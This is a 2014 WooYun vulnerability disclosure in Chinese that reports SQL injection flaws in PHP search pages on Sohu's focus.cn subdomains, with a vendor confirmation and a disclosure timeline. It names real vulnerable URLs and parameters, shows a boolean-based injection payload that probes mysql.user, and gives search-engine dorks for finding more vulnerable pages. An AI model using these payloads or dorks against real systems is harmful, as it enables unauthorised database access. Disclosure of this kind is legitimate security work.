[公开漏洞]搜狐旗下某站二级域名下四处sql注入之九（番外篇）

搜狐旗下某站二级域名下四处sql注入之九（番外篇） 相关厂商： 搜狐 漏洞作者：浩天 提交时间：2014-04-21 10:54 公开时间：2014-06-05 10:54 漏洞类型：SQL注射漏洞 危害等级：高 自评Rank：20 漏洞状态： 厂商已经确认 漏洞来源：http://www.wooyun.org Tags标签： php+数字类型注射 注射技巧 php+Mysql 漏洞详情 披露状态：

2014-04-21：细节已通知厂商并且等待厂商处理中
2014-04-21：厂商已经确认，细节仅向厂商公开
2014-05-01：细节向核心白帽子及相关领域专家公开
2014-05-11：细节向普通白帽子公开
2014-05-21：细节向实习白帽子公开
2014-06-05：细节向公众公开

简要描述：

越来越不好找了吖，接第8集，番外篇，post&get都可以

详细说明：

貌似post&get都可以提交，post下发现的注入点

地址1：

http://house.focus.cn/housemarket/video/video_search.php?salestatus=3

注入点：salestatus=

地址2：

http://house.focus.cn/housemarket/video/video_search.php?location=8

注入点：location=

漏洞证明：

下面是地区二级域名通用的，手动能穷举内容，但是工具只能确定是注入点，读不出数据，不好利用，但是肯定是

地址3：

http://office.tj.focus.cn/office_search/office_search.php?chk_gov_locate_id=2' and exists(select * from mysql.user) and '%'='%

页面数据回显正确，说明mysql.user存在，当改成mysql.user1的时候，数据没显示了，说明没有user1

http://office.tj.focus.cn/office_search/office_search.php?chk_gov_locate_id=2' and exists(select * from mysql.user1) and '%'='%

可以手动穷举，工具不知道什么情况，没读了库

注入点：hk_gov_locate_id=

.......

很多，

site:focus.cn inurl:office_search.php?chk_gov_locate_id=

地址4：http://office.sz.focus.cn/common/modules/go2map/office_result.php?map=id&data_id=580336

注入点：data_id=

......

site:focus.cn inurl:office_result.php?map=id&data_id=

修复方案：

最近脖子疼！！

版权声明：转载请注明来源 浩天@乌云 漏洞回应 厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-04-21 11:13

厂商回复：

感谢支持。

最新状态：

暂无